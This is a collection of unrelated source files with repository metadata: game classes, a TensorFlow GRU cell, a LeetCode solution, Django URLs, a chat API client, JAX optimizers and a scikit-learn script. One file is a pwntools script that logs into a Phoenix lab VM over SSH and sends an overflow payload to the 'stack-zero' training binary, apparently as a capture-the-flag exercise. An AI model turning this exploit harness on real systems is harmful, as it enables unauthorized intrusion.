        """Add coins; without an argument the default bonus of 5 is used.

        Bug fix: the original defined gainCoins twice, so the parameterized
        version was silently shadowed by the zero-argument one.  Merging
        them with a default keeps both call styles working.
        """
        self.coins += numberOfCoins

    def loseLife(self):
        """Remove one life (never below zero); mark dead at zero lives."""
        if self.lives != 0:
            self.lives -= 1
        if self.lives == 0:
            self.isAlive = False

    def gainLife(self):
        """Grant a life below the 3-life cap; convert to 10 coins at/above it."""
        if self.lives > 0 and self.lives < 3:
            self.lives += 1
        elif self.lives >= 3:
            self.coins += 10

    def __str__(self):
        return "Hi! I am {}. I have {} lives left and {} coins.".format(self.name, self.lives, self.coins)
##########################################################
class Bowser:
    """Antagonist with a name, a life count, and an alive flag."""

    def __init__(self, name, lives, isAlive):
        # Bug fix: the original __init__ was missing its colon and body,
        # which made the whole module a SyntaxError and left the
        # attributes that __eq__/__repr__ read unset.
        self.name = name
        self.lives = lives
        self.isAlive = isAlive

    # the following method is provided to you
    def __eq__(self, other):
        return (self.name == other.name and
            self.lives == other.lives and
            self.isAlive == other.isAlive)

    # the following method is provided to you
    def __repr__(self):
        return f"Bowser({self.name})"
##########################################################
class World:
    """A game world identified by a name and the Bowser that rules it."""

    def __init__(self, name, bowser):
        # The original class had no __init__, so __repr__ crashed with
        # AttributeError; store the two attributes it formats.
        self.name = name
        self.bowser = bowser

    # the following method is provided to you
    def __repr__(self):
        return f"World({self.name}, {self.bowser})"
mario = Mario('mario1', 5, 20, False)
print(mario) | [
"sanjay.mamidipaka@gmail.com"
] | sanjay.mamidipaka@gmail.com |
3a0ee48998c73dcaba59b9b6952779f01f19b873 | b3ac393b2e30d8dfa403a0f70ef3e112781aef05 | /tensorflow_attention/Dynamic-Memory-Networks-in-TensorFlow/attention_gru_cell.py | 681887ced27dfd2aba57b28ab75d3eccb1d9b039 | [
"MIT"
] | permissive | xiongfeihtp/attention | d948038dd8dd3c633fde003b61b48fd74308b5bb | ad2140235462e423860e1ddc3be6f2d587f5aed9 | refs/heads/master | 2021-05-16T16:25:27.541002 | 2018-02-02T06:23:55 | 2018-02-02T06:23:55 | 119,941,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,962 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops.math_ops import sigmoid
from tensorflow.python.ops.math_ops import tanh
from tensorflow.python.ops.rnn_cell_impl import RNNCell
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
class AttentionGRUCell(RNNCell):
    """Gated Recurrent Unit incoporating attention (cf. https://arxiv.org/abs/1603.01417).
    Adapted from https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py
    NOTE: Takes an input of shape: (batch_size, max_time_step, input_dim + 1)
    Where an input vector of shape: (batch_size, max_time_step, input_dim)
    and scalar attention of shape: (batch_size, max_time_step, 1)
    are concatenated along the final axis"""

    def __init__(self, num_units, input_size=None, activation=tanh):
        # input_size is accepted only for backward compatibility; it is
        # ignored apart from the deprecation warning.
        if input_size is not None:
            logging.warn("%s: The input_size parameter is deprecated.", self)
        self._num_units = num_units
        self._activation = activation

    @property
    def state_size(self):
        # State and output are both the hidden vector of size num_units.
        return self._num_units

    @property
    def output_size(self):
        return self._num_units

    def __call__(self, inputs, state, scope=None):
        """Attention GRU with nunits cells."""
        with vs.variable_scope(scope or "attention_gru_cell"):
            with vs.variable_scope("gates"):  # Reset gate and update gate.
                # We start with bias of 1.0 to not reset and not update.
                # Last input column must be the scalar attention value g.
                if inputs.get_shape()[-1] != self._num_units + 1:
                    raise ValueError("Input should be passed as word input concatenated with 1D attention on end axis")
                # extract input vector and attention
                inputs, g = array_ops.split(inputs,
                        num_or_size_splits=[self._num_units,1],
                        axis=1)
                # Reset gate r computed from input and previous state.
                r = _linear([inputs, state], self._num_units, True)
                r = sigmoid(r)
            with vs.variable_scope("candidate"):
                # Gate the state's contribution to the candidate by r.
                r = r*_linear(state, self._num_units, False)
            with vs.variable_scope("input"):
                x = _linear(inputs, self._num_units, True)
            h_hat = self._activation(r + x)

            # Attention scalar g replaces the usual GRU update gate: the new
            # state is a g-weighted mix of the old state and the candidate.
            new_h = (1 - g) * state + g * h_hat
        return new_h, new_h
def _linear(args, output_size, bias, bias_start=0.0):
    """Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.
    Args:
        args: a 2D Tensor or a list of 2D, batch x n, Tensors.
        output_size: int, second dimension of W[i].
        bias: boolean, whether to add a bias term or not.
        bias_start: starting value to initialize the bias; 0 by default.
    Returns:
        A 2D Tensor with shape [batch x output_size] equal to
        sum_i(args[i] * W[i]), where W[i]s are newly created matrices.
    Raises:
        ValueError: if some of the arguments has unspecified or wrong shape.
    """
    if args is None or (nest.is_sequence(args) and not args):
        raise ValueError("`args` must be specified")
    if not nest.is_sequence(args):
        args = [args]

    # Calculate the total size of arguments on dimension 1.
    total_arg_size = 0
    shapes = [a.get_shape() for a in args]
    for shape in shapes:
        if shape.ndims != 2:
            raise ValueError("linear is expecting 2D arguments: %s" % shapes)
        if shape[1].value is None:
            raise ValueError("linear expects shape[1] to be provided for shape %s, "
                    "but saw %s" % (shape, shape[1]))
        else:
            total_arg_size += shape[1].value

    # All args are assumed to share a dtype; the first one's is used.
    dtype = [a.dtype for a in args][0]

    # Now the computation.
    scope = vs.get_variable_scope()
    with vs.variable_scope(scope) as outer_scope:
        weights = vs.get_variable(
            "weights", [total_arg_size, output_size], dtype=dtype)
        # One matmul of the concatenated inputs is equivalent to summing
        # per-argument matmuls against slices of `weights`.
        if len(args) == 1:
            res = math_ops.matmul(args[0], weights)
        else:
            res = math_ops.matmul(array_ops.concat(args, 1), weights)
        if not bias:
            return res
        with vs.variable_scope(outer_scope) as inner_scope:
            # Clearing the partitioner keeps the bias vector unsharded even
            # when the surrounding scope partitions variables.
            inner_scope.set_partitioner(None)
            biases = vs.get_variable(
                "biases", [output_size],
                dtype=dtype,
                initializer=init_ops.constant_initializer(bias_start, dtype=dtype))
        return nn_ops.bias_add(res, biases)
| [
"386344277@qq.com"
] | 386344277@qq.com |
86e22796fd49804a0b71c6dc36f1b9ad6bb9a40b | 7950c4faf15ec1dc217391d839ddc21efd174ede | /leetcode-cn/0888.2_Fair_Candy_Swap.py | c6375c9f5055643919390828fb7f897dce3fe0f8 | [] | no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | '''
approach: Set
Time: O(M + N + M * 1) = O(M + N)
Space: O(N)
执行结果:通过
显示详情
执行用时:328 ms, 在所有 Python 提交中击败了91.76%的用户
内存消耗:15.5 MB, 在所有 Python 提交中击败了21.18%的用户
'''
class Solution(object):
    def fairCandySwap(self, A, B):
        """
        :type A: List[int]
        :type B: List[int]
        :rtype: List[int]

        Alice gives x and Bob gives y; fairness requires
        sumA - x + y == sumB - y + x, i.e. y - x == (sumB - sumA) / 2.
        """
        sumA, sumB = sum(A), sum(B)
        setB = set(B)
        # Floor division keeps target_diff an int on both Python 2 and 3
        # (the original `/` became float division under Python 3, which
        # broke the set-membership test; the problem guarantees the
        # difference is even, so `//` is exact).
        target_diff = (sumB - sumA) // 2
        for x in A:
            if x + target_diff in setB:
                return [x, x + target_diff]
        # A valid swap is guaranteed by the problem; -1 flags bad input.
        # print() form works on both Python 2 and 3.
        print('not found')
        return -1
| [
"lixiang@rxthinking.com"
] | lixiang@rxthinking.com |
0e55056f6bf6705900cc18bca79256d0f9cdfd70 | 200e0840fb8d5c71de509c1325fc1295336109f8 | /E_Pasal/urls.py | c85b9fe9aa3ca600b55f56d73781c551f6dc3e23 | [] | no_license | LakpaSherpa/E-pasal | d27ee490f6efdd27dee6b27c798e00402d6da07a | c144d45ecaa7e9feee8c507a9e54dd84632c314d | refs/heads/master | 2020-05-04T04:49:03.426196 | 2019-04-02T01:48:13 | 2019-04-02T01:48:13 | 178,974,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | """epasal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib import admin
from django.urls import path
from django.conf.urls.static import static
from django.conf import settings
from cms.views import SignUpView
from shop.views import Homepage, ProductView, CartView, CategoryApi
# URL table for the project; the `name` values are used by reverse lookups.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('', Homepage.as_view(), name='Homepage'),
    path('product/<int:product_id>', ProductView.as_view(), name='product-page'),
    path('accounts/', include('django.contrib.auth.urls')),
    path('signup', SignUpView.as_view(), name='signup'),
    path('cart/<int:product_id>', CartView.as_view(), name='cart_page'),
    # Bug fix: path() takes (route, view, name=...); the original passed the
    # string 'Categories' as the view argument, which raises a TypeError
    # when Django resolves the URLconf.
    path('api', CategoryApi.as_view(), name='Categories'),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"you@example.com"
] | you@example.com |
e734bd3f2156c38cad54ed1111896981ce383c57 | ea7d2090ba1d66fc5bf91b255742ae07e1f74c3d | /exploit_education/phoenix/challs/stack-zero.py | 4bdf71baace7d0a28f3bf95cfd665fd60991737f | [] | no_license | arty-hlr/CTF-writeups | 1a3e29b9a3c3b80e33df0c9489cacd6ec09e46fe | 64bcda1d1d8893c2ece308f82348755a2c62ca9e | refs/heads/master | 2022-08-04T20:26:07.428393 | 2022-07-30T11:11:34 | 2022-07-30T11:11:34 | 167,851,059 | 4 | 3 | null | 2022-07-30T10:55:11 | 2019-01-27T19:47:03 | Python | UTF-8 | Python | false | false | 1,294 | py | from pwn import *
context(terminal=['tmux','new-window'])
exe = context.binary = ELF('stack-zero')
host = args.HOST or 'localhost'
port = int(args.PORT or 2222)
user = args.USER or 'user'
password = args.PASSWORD or 'user'
remote_path = '/opt/phoenix/amd64/stack-zero'
# Connect to the remote SSH server
shell = None
if not args.LOCAL:
shell = ssh(user, host, port, password)
shell.set_working_directory(symlink=True)
def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    # NOTE(review): mutable default argv is shared across calls; harmless
    # here because it is only read, never mutated.
    if args.GDB:
        # Launch under gdb with the module-level gdbscript.
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
    '''Execute the target binary on the remote host'''
    # Runs over the module-level ssh session `shell`, optionally under gdb.
    if args.GDB:
        return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw)
    else:
        return shell.process([remote_path] + argv, *a, **kw)
def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    # Dispatch between the local and ssh-backed launchers based on the
    # LOCAL command-line switch.
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)
gdbscript = '''
tbreak main
continue
'''.format(**locals())
# .format(**locals()) allows {name} placeholders in the script; this one
# has none, so formatting is a no-op.

# -- Exploit goes here --

io = start()
# Overflow the input buffer with 100 'a's — assumed large enough to clobber
# stack-zero's flag variable; TODO confirm against the binary's layout.
io.sendline(b'a'*100)
io.recvline()
print(io.recvall().decode())
# io.interactive()
| [
"flrn.pjd@protonmail.com"
] | flrn.pjd@protonmail.com |
348c1cf02933653a42d99e5cfad410ff4ad2f63a | 4df60d6ad3e6227caaefac1b6775e66718ff28ea | /easemob/client.py | e7210c34f3219eeb9354d72da9d570bef5414f79 | [] | no_license | cash2one/ESNS | 00d09a73e33705a8421438e762fdfc52aba58b8d | f8b5cb3adcb8c907834ec3fad1f82bf36be688b7 | refs/heads/master | 2021-01-13T17:01:23.622918 | 2016-03-23T03:11:15 | 2016-03-23T03:11:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,020 | py | # coding=utf-8
# Date: 15/1/19'
# Email: wangjian2254@icloud.com
import threading
from requests.auth import AuthBase
from easemob.models import HuanXin
from django.conf import settings
__author__ = u'王健'
import requests
import json
from time import time
JSON_HEADER = {'content-type': 'application/json'}
# EASEMOB_HOST = "http://localhost:8080"#
EASEMOB_HOST = "https://a1.easemob.com/%s/%s/" % (settings.HUANXIN_ORG, settings.HUANXIN_APP)
EASEMOB_HOST_USERS = '%susers' % EASEMOB_HOST
EASEMOB_HOST_GROUPS = '%schatgroups' % EASEMOB_HOST
DEBUG = False
def put(url, payload, auth=None):
    """
    Issue an HTTP PUT with a JSON-serialized body.
    by:王健 at:2015-2-27
    :param url: endpoint URL
    :param payload: object serialized to JSON as the request body
    :param auth: optional requests auth object (the Easemob token)
    :return: (ok, data) pair from http_result
    """
    r = requests.put(url, data=json.dumps(payload), headers=JSON_HEADER, auth=auth)
    return http_result(r)
def post(url, payload, auth=None):
    """
    Issue an HTTP POST with a JSON-serialized body.
    by:王健 at:2015-1-20
    :param url: endpoint URL
    :param payload: object serialized to JSON as the request body
    :param auth: optional requests auth object (the Easemob token)
    :return: (ok, data) pair from http_result
    """
    r = requests.post(url, data=json.dumps(payload), headers=JSON_HEADER, auth=auth)
    return http_result(r)
def get(url, auth=None):
    """
    Issue an HTTP GET.
    by:王健 at:2015-1-20
    :param url: endpoint URL
    :param auth: optional requests auth object (the Easemob token)
    :return: (ok, data) pair from http_result
    """
    r = requests.get(url, headers=JSON_HEADER, auth=auth)
    return http_result(r)
def delete(url, auth=None):
    """
    Issue an HTTP DELETE.
    by:王健 at:2015-1-20
    :param url: endpoint URL
    :param auth: optional requests auth object (the Easemob token)
    :return: (ok, data) pair from http_result
    """
    r = requests.delete(url, headers=JSON_HEADER, auth=auth)
    return http_result(r)
def http_result(r):
    """
    Normalize a requests response into an (ok, data) pair.
    by:王健 at:2015-1-20, error logging added 2015-3-12
    :param r: requests Response object
    :return: (True, parsed_json) on HTTP 200; otherwise logs the body to
        the 'django' logger and returns (False, raw_text)
    """
    if DEBUG:
        # Dump the complete request/response pair as JSON for debugging.
        error_log = {
            "method": r.request.method,
            "url": r.request.url,
            "request_header": dict(r.request.headers),
            "response_header": dict(r.headers),
            "response": r.text
        }
        if r.request.body:
            error_log["payload"] = r.request.body
        print json.dumps(error_log)
    if r.status_code == requests.codes.ok:
        return True, r.json()
    else:
        # NOTE(review): only 200 counts as success here; other 2xx codes
        # (e.g. 201) are treated as errors — confirm against the Easemob
        # REST API's actual status codes.
        import logging
        log = logging.getLogger('django')
        log.error(r.text)
        return False, r.text
def register_new_user(username, password):
"""
注册新的app用户
POST /{org}/{app}/users {"username":"xxxxx", "password":"yyyyy"}
by:王健 at:2015-1-20
"""
payload = {"username": username, "password":password}
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return post(EASEMOB_HOST_USERS, payload, token)
def reset_password(username, password=''):
"""
重置环信密码
POST /{org}/{app}/users {"username":"xxxxx", "password":"yyyyy"}
by:尚宗凯 at:2015-3-19
修改函数名称,改为put方法
by:尚宗凯 at:2015-3-19
"""
payload = {"username": username, "password":password}
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return put(EASEMOB_HOST_USERS, payload, token)
def get_group_members(group_id):
"""
更新群组成员
GET /{org}/{app}/chatgroups/group_id/users
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return get(EASEMOB_HOST_GROUPS + '/%s/users' % group_id, token)
def add_group_member(group_id, usernames):
"""
更新群组成员
POST /{org}/{app}/chatgroups/group_id/users
by:王健 at:2015-2-27
修改为添加单个用户
by:王健 at:2015-2-28
"""
# payload = {"usernames": usernames}
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return post(EASEMOB_HOST_GROUPS + '/%s/users/%s' % (group_id, usernames), None, token)
def delete_group_member(group_id, username):
"""
更新群组成员
DELETE /{org}/{app}/chatgroups/group_id/users/username
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return delete(EASEMOB_HOST_GROUPS + '/%s/users/%s' % (group_id, username), token)
def register_new_group(payload):
"""
注册新的app用户
POST /{org}/{app}/chatgroups
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return post(EASEMOB_HOST_GROUPS, payload, token)
def update_group_info(group_id, payload):
"""
注册新的app用户
PUT /{org}/{app}/chatgroups/group_id
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return put(EASEMOB_HOST_GROUPS + '/%s' % group_id, payload, token)
class Token(AuthBase):
"""
从数据库中获取 token
by:王健 at:2015-1-20
"""
def __call__(self, r):
r.headers['Authorization'] = 'Bearer ' + self.get_token()
return r
def get_token(self):
"""
获取token信息
by:王健 at:2015-1-20
:return:
"""
return self.token
def __init__(self,):
self.token = None
self.exipres_in = 0
self.authing = False
def make_token(self):
"""
从数据库中获取一个token
by:王健 at:2015-1-20
修复 环信 token bug
by:王健 at:2015-3-9
"""
tl = HuanXin.objects.filter(app=settings.HUANXIN_APP).order_by('-exipres_in')[:1]
for t in tl:
self.token = str(t.token)
self.exipres_in = t.exipres_in
self.authing = False
def is_not_valid(self):
"""这个token是否还合法, 或者说, 是否已经失效了, 这里我们只需要
检查当前的时间, 是否已经比或者这个token的时间过去了exipreis_in秒
即 current_time_in_seconds < (expires_in + token_acquired_time)
by:王健 at:2015-1-20
"""
return self.get_authimg(time() > self.exipres_in)
def get_authimg(self, valid):
"""
自动去获取,新的token
:param valid:
:return:
"""
if valid:
if not self.authing:
self.authing = True
AuthThread().start()
return valid
class AuthThread(threading.Thread):
"""
异步执行获取token的函数
by:王健 at:2015-1-20
修复bug,去除无用参数
by:王健 at:2015-3-8
:return:
"""
def __init__(self):
threading.Thread.__init__(self)
def run(self):
"""
执行获取token的函数
by:王健 at:2015-1-20
:return:
"""
import views
views.create_huanxin_token(None)
token.make_token()
token = Token()
token.make_token() | [
"appleface2050@qq.com"
] | appleface2050@qq.com |
f7ac58f84c3577f4f603147ee5be49f96f1f5b4a | b9f21bc90eed396dde950c30a1b482be0fb8ba30 | /library/web/mechanicaloup/prac2.py | 33041236a8c20f86afca8d40825615f2cf26c19d | [] | no_license | nanigasi-san/nanigasi | 127a21db1b31759908fd74cebabe240e5abf8267 | 5e3c3e78344dd9558cafe439beb272b9a80d0f3a | refs/heads/master | 2020-04-03T18:57:40.132489 | 2019-06-19T15:03:38 | 2019-06-19T15:03:38 | 155,504,101 | 1 | 0 | null | 2019-02-20T09:40:05 | 2018-10-31T05:33:11 | Python | UTF-8 | Python | false | false | 324 | py | """Example usage of MechanicalSoup to get the results from
DuckDuckGo."""
import mechanicalsoup
# Connect to duckduckgo
browser = mechanicalsoup.StatefulBrowser()
browser.open("https://github.com")
button_list = browser.get_current_page().find_all("button")
for button in button_list:
print(button)
print("="*30)
| [
"nanigasi.py@gmail.com"
] | nanigasi.py@gmail.com |
aa510a127eef08160fbd491053f6d820ca9c708e | 0bbc13968c2793878f24045b318a17bb31524eb1 | /new_adventure/UnconstrainedOptimizers.py | ad37c3048a40cf5310c67dcff1c0a2e191876b0d | [] | no_license | daniellengyel/new_adventure | 572f82baa5d159cdc541ba9d377a863c7f424981 | 2f83060f4005b9d35e40f0f0d4c6ed0875a26a93 | refs/heads/main | 2023-08-24T21:32:28.003051 | 2021-10-17T17:02:47 | 2021-10-17T17:02:47 | 307,684,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,505 | py | import numpy as np
import jax.numpy as jnp
from jax import random as jrandom
import jax
from functools import partial
from jax import lax
import time, sys
import pickle
from .Functions import LinearCombination, GaussianSmoothing
from .utils import get_barrier, get_potential
import os, psutil
process = psutil.Process(os.getpid())
def get_optimizer(config):
    """Instantiate the optimizer named by config["optimization_name"].

    Raises:
        ValueError: for an unknown optimizer name.  The original silently
            returned None, which deferred the failure to an opaque
            AttributeError at the call site.
    """
    name = config["optimization_name"]
    if name == "GaussianSmoothing":
        return GaussianSmoothingOptimization(config)
    if name == "Gradient_Descent":
        return Gradient_Descent(config)
    raise ValueError("Unknown optimization_name: {!r}".format(name))
class UnconstrainedOptimization:
    """Base class for iterative line-search optimizers.

    Subclasses supply the search direction via step_getter (and optional
    per-step bookkeeping via post_step); this class runs the damped
    iteration with Armijo backtracking and a Newton-decrement stop test.
    """

    def __init__(self, config):
        self.config = config
        # Objective with f (value) and f1 (gradient) evaluations.
        self.obj = get_potential(config)
        # Armijo constant, backtracking factor and stopping tolerance.
        self.c1 = config["optimization_meta"]["c1"]
        self.c2 = config["optimization_meta"]["c2"]
        self.delta = config["optimization_meta"]["delta"]
        self.with_neystrom = config["optimization_meta"]["with_neystrom"]
        self.jrandom_key = jrandom.PRNGKey(config["optimization_meta"]["jrandom_key"])
        self.linesearch = helper_linesearch(self.obj, self.c1, self.c2)
        # Global step budget, shared across repeated update() calls.
        self.loop_steps_remaining = config["num_total_steps"]
        self.verbose = True

    def update(self, X, time_step, full_vals=False, full_path=False):
        """Run the optimization loop in place on X (shape (1, d)).

        Returns (X, trace) where trace records (iterate, wall-time) pairs
        when full_path, (objective, wall-time) pairs when full_vals, else
        None.  `time_step` is currently unused.
        """
        assert not (full_vals and full_path)
        if full_path:
            full_path_arr = [(X.copy(), time.time())]
        if full_vals:
            vals_arr = [(self.obj.f(X)[0], time.time())]
        t = 0
        while self.loop_steps_remaining > 0:
            self.loop_steps_remaining -= 1
            t += 1

            # get search direction
            self.jrandom_key, subkey = jrandom.split(self.jrandom_key)
            search_direction, f1 = self.step_getter(X, subkey, t)
            newton_decrement_squared = -f1.dot(search_direction)

            # check if valid search direction (must be a descent direction)
            if newton_decrement_squared < 0:
                # Non-descent direction: skip the step but still record it.
                if full_path:
                    full_path_arr.append((X.copy(), time.time()))
                if full_vals:
                    vals_arr.append((self.obj.f(X)[0], time.time()))
                continue

            newton_decrement = np.sqrt(np.abs(newton_decrement_squared))

            if self.verbose:
                print("Newton Decrement Squared", newton_decrement_squared)
                print("Obj", float(self.obj.f(X)[0]))
                print("Steps Remaining", self.loop_steps_remaining)
                print()

            # Check if completed
            if newton_decrement**2 < self.delta:
                break

            # do line search
            alpha = self.linesearch(X[0], search_direction, f1, t)

            # update step #1/(1 + newton_decrement) *
            X[0] = X[0] + alpha * search_direction

            if full_path:
                full_path_arr.append((X.copy(), time.time()))
            if full_vals:
                vals_arr.append((self.obj.f(X)[0], time.time()))

            # clean up after update (i.e. BFGS update)
            self.jrandom_key, subkey = jrandom.split(self.jrandom_key)
            self.post_step(X, subkey, t)

        if full_path:
            return X, full_path_arr
        if full_vals:
            return X, vals_arr
        return X, None

    def step_getter(self, X, jrandom_key, t):
        # Subclass hook: return (search_direction, gradient).
        pass

    def post_step(self, X, jrandom_key, t):
        # Subclass hook: per-step state maintenance after the update.
        pass
class Gradient_Descent(UnconstrainedOptimization):
    """Plain gradient descent: the search direction is the negative gradient."""

    def __init__(self, config):
        super().__init__(config)

    def step_getter(self, X, jrandom_key, t):
        # Evaluate the gradient once instead of twice as the original did;
        # both elements of the returned tuple come from the same f1 value.
        grad = self.obj.f1(X)[0]
        return -grad, grad
class GaussianSmoothingOptimization(UnconstrainedOptimization):
    """Newton-like optimizer whose gradient and Hessian are Monte-Carlo
    estimates from Gaussian smoothing of the objective."""

    def __init__(self, config):
        super().__init__(config)
        # Smoothing radius and sampling configuration.
        self.sigma = config["optimization_meta"]["sigma"]
        self.d_prime = config["optimization_meta"]["d_prime"]
        self.smoothing = GaussianSmoothing(self.obj, config["optimization_meta"]["num_samples"], config["optimization_meta"]["sigma"])

    # static_argnums=(0,) marks `self` static so jit can trace through the
    # instance's attributes.
    @partial(jax.jit, static_argnums=(0,))
    def step_getter(self, X, jrandom_key, t):
        sigma = self.sigma
        # sigma = sigma * jnp.e**(- 0.0001 * t)
        # Independent subkeys for the Hessian and gradient estimates; the
        # local reassignment of jrandom_key has no effect outside this call.
        jrandom_key, subkey = jrandom.split(jrandom_key)
        approx_H = self.smoothing.f2(X, subkey, sigma)[0]
        jrandom_key, subkey = jrandom.split(jrandom_key)
        f1 = self.smoothing.f1(X, subkey, sigma)[0]
        # Newton step: solve approx_H * d = -f1 (via explicit inverse).
        search_direction = -jnp.linalg.inv(approx_H).dot(f1)
        return search_direction, f1
# class BFGS(UnconstrainedOptimization):
# def __init__(self, config):
# super().__init__(config)
# self.H_inv = np.eye(config["domain_dim"])
# self.X_prev = None
# def step_getter(self, X, jrandom_key, t):
# self.X_prev = X[0].copy()
# f1 = self.combined_F.f1(X)
# return -self.H_inv.dot(f1[0])
# def post_step(self, X, jrandom_key, t):
# self.H_inv = BFGS_update(self.combined_F, self.X_prev, X[0], self.H_inv)
def helper_linesearch(obj, c1, c2):
    """Return a backtracking line-search closure over objective `obj`.

    The closure enforces the Armijo sufficient-decrease condition with
    acceptance constant `c1`, shrinking the step by factor `c2` until the
    condition holds.  `t` is accepted for interface compatibility only.
    """

    def backtrack(x_0, search_direction, f1, t):
        base_value = obj.f(x_0.reshape(1, -1))[0]
        directional_derivative = jnp.inner(search_direction, f1)

        def still_too_high(step):
            trial = (x_0 + step * search_direction).reshape(1, -1)
            return obj.f(trial)[0] > base_value + c1 * step * directional_derivative

        step = 1
        while still_too_high(step):
            step = c2 * step
        return step

    return backtrack
| [
"daniel.lengyel@berkeley.edu"
] | daniel.lengyel@berkeley.edu |
5172cab88859eb1b658049d394587109ef3cccaa | 118c520121813b23d9307fb379d4d9406adef2e4 | /03_Classification/logistic_regression.py | bb3bfa5540aa92fb7d3c945e1c807de8a199a5e6 | [] | no_license | a-bautista/machine-learning-udemy | 63735c9f00544c3a79d395d00afa45d395cc7316 | 2632cab6e40dcecdc330e77c024f9ef21c65159b | refs/heads/master | 2021-04-18T19:37:16.347178 | 2019-04-10T05:02:16 | 2019-04-10T05:02:16 | 126,140,328 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,088 | py | # !Python 3.5.2
# Author: Alejandro Bautista Ramos
# Importing the libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
from matplotlib.colors import ListedColormap
def main():
    """Entry point: run the full logistic-regression demo pipeline."""
    data_processing()
def data_processing():
# ---------------------------------------- Retrieve the dataset --------------------------------------------- #
dataset = pd.read_csv("C:\\Users\\abautista\\PycharmProjects\\Machine_Learning_000\\csv_files\\Social_Network_Ads.csv")
# take all the columns except the last one for your matrix of features
X = dataset.iloc[:, [2,3]].values
y = dataset.iloc[: ,4].values
# ------------------------ Splitting the dataset into Training set and Test set ------------------------------------ #
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state=0)
# ------------------------------------------ Feature scaling ------------------------------------------------------- #
sc_X = StandardScaler()
# we scale our training set variables to avoid domination of one big variable against the others and then we apply the changes
# with fit_transform
X_train = sc_X.fit_transform(X_train)
# we scale the variables in our test set but we do not fit in our test set because we already fit in our training set
X_test = sc_X.transform(X_test)
# ------------------------------------- Fitting Logistic Regression ---------------------------------------------- #
classifier = LogisticRegression(random_state=0)
classifier.fit(X_train, y_train)
# ----------------------------------- Predicting the Test Set Results -------------------------------------------- #
y_pred = classifier.predict(X_test)
print("Results: \n", y_pred)
# ----------------------------------- Making the confusion matrix ----------------------------------------------- #
cm = confusion_matrix(y_test, y_pred)
print("Confusion matrix: \n",cm)
# ---------------------------------- Visualizing the Training set results ---------------------------------------- #
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() -1, stop = X_set[:, 0].max() + 1, step = 0.01),\
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step=0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label=j)
plt.title('Logistic Regression (Training Set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
# ---------------------------------- Visualizing the Test set results ---------------------------------------- #
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() -1, stop = X_set[:, 0].max() + 1, step = 0.01),\
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step=0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
